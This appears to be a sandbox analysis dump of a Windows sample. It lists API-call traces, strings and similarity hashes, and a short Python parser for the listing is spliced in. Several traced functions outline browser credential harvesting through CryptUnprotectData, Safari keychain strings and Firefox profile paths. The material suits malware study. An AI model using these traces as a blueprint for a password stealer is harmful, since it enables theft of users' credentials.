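• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044D5
• FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
"""

# One bullet of the API list: optional "Part of subcall function XXXX:" prefix,
# Name.MODULE, optional (args), then "ref: ADDRESS".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")   # "• Key: value" bullets
HEX_RE = re.compile(r"^[0-9A-F]{8}$")                         # 32-bit literal argument
META_HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Strings"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: Optional[str] = None  # callee address when the API sits in a subcall


@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)  # key/value bullets below the API list


def parse_entries(text):
    """Split the listing into FunctionEntry records, one per 'APIs' block."""
    entries, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        # A new entry starts at "APIs", or at "Memory Dump Source" when the
        # previous entry is already complete (entries with no API list).
        if line == "APIs" or (line == "Memory Dump Source" and (cur is None or cur.meta)):
            cur = FunctionEntry()
            entries.append(cur)
        if line == "APIs":
            in_apis = True
            continue
        if line in META_HEADERS:
            in_apis = False
            continue
        if cur is None or not line:
            continue
        if in_apis:
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] else []
                cur.calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        else:
            m = KV_RE.match(line)
            if m:
                cur.meta[m["key"].strip()] = m["val"].strip()
    return entries


def tokenize(api_name):
    """Split a Win32 name into CamelCase words and drop words of 3 chars or
    fewer (Get/Set/Ex/W/Box vanish, as the report's API ID field shows).
    CRT names with no capitals (memset, _wcsicmp) stay whole.  C++ mangled
    names such as ??2@YAPAXI@Z are not handled by this inferred rule."""
    if not re.search(r"[A-Z]", api_name):
        return [api_name]
    return [t for t in re.findall(r"[A-Z][a-z]*", api_name) if len(t) > 3]


def api_id(entry):
    """Rebuild 'API ID': tokens grouped by occurrence count, most frequent
    group first, '$' between groups, ASCII order inside a group; subcalls count."""
    counts = Counter(t for c in entry.calls for t in tokenize(c.name))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def string_id(entry):
    """Rebuild 'String ID': every non-numeric, non-'?' argument, ASCII sorted."""
    strings = {a for c in entry.calls for a in c.args if a != "?" and not HEX_RE.match(a)}
    return "$".join(sorted(strings))


def clipboard_from_file(entry):
    """True when the function's own calls read a file and later pass a buffer to
    SetClipboardData with format CF_UNICODETEXT, the sequence at 004098EC."""
    direct = [c for c in entry.calls if c.subcall_of is None]
    read_at = next((i for i, c in enumerate(direct) if c.name == "ReadFile"), None)
    if read_at is None:
        return False
    return any(c.name == "SetClipboardData" and c.args and HEX_RE.match(c.args[0])
               and int(c.args[0], 16) == CF_UNICODETEXT for c in direct[read_at + 1:])


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        first = e.calls[0].ref if e.calls else "?"
        print(first, api_id(e), "| clipboard-from-file:", clipboard_from_file(e))
```

The reconstruction of "API ID" is confirmed only against the entries visible on this page; treat it as a way to cross-check a report, not as the vendor's specification.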
                                                                              APIs
                                                                              • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                              • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044D5
                                                                              • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                              • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                               • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadMessageProc
                                                                              • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                              • API String ID: 2780580303-317687271
                                                                              • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                              • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                              • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                              • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
• Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
• Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
• Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
• Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
• Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
• Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• free.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
• Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
• Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
• Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
• Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
• Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
APIs
• NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
• Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
• Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
• Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,Function_0004E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
• API String ID: 2929817778-1134094380
• Opcode ID: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
• Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
• Opcode Fuzzy Hash: 6b2dcad71dd29105a6653737fa8e45fa2e3e7ed8fa5e3c17c72860e5870ea394
• Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
• API String ID: 2787044678-1921111777
• Opcode ID: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
• Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
• Opcode Fuzzy Hash: 85229931f2ccbd74a6531f2d0de6690d75679dd48fe0e438e0be0f2671899311
• Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
• Opcode ID: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
• Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
• Opcode Fuzzy Hash: d5ee3c6463b2dd39cebf85bfb280f62e7b68b75cb8304e0a6374ce3c4529937b
• Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
• {Unknown}, xrefs: 004132A6
Memory Dump Source
• Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
• Opcode ID: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
• Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
• Opcode Fuzzy Hash: 40febe18c8ea58ee401dc1d7e9b16ea7dd9e42426c780dab9fc2ef4c2d2113e8
• Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                              • SetCursor.USER32(00000000), ref: 0040129E
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                              • String ID:
                                                                              • API String ID: 829165378-0
                                                                              • Opcode ID: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                              • Opcode Fuzzy Hash: d28eae30b51bd20c699493622e1b5036da36ceab07d34b4d33997197d58435e6
                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00404172
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                              • memset.MSVCRT ref: 00404200
                                                                              • memset.MSVCRT ref: 00404215
                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                              • memset.MSVCRT ref: 0040426E
                                                                              • memset.MSVCRT ref: 004042CD
                                                                              • memset.MSVCRT ref: 004042E2
                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_34_2_400000_Vaccinerende.jbxd
                                                                              Similarity
                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                              • API String ID: 2454223109-1580313836
                                                                              • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                              • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                              APIs
                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                              • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000022.00000002.850783453.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000022.00000002.850783453.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                              • Associated: 00000022.00000002.850783453.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                              Joe Sandbox IDA Plugin
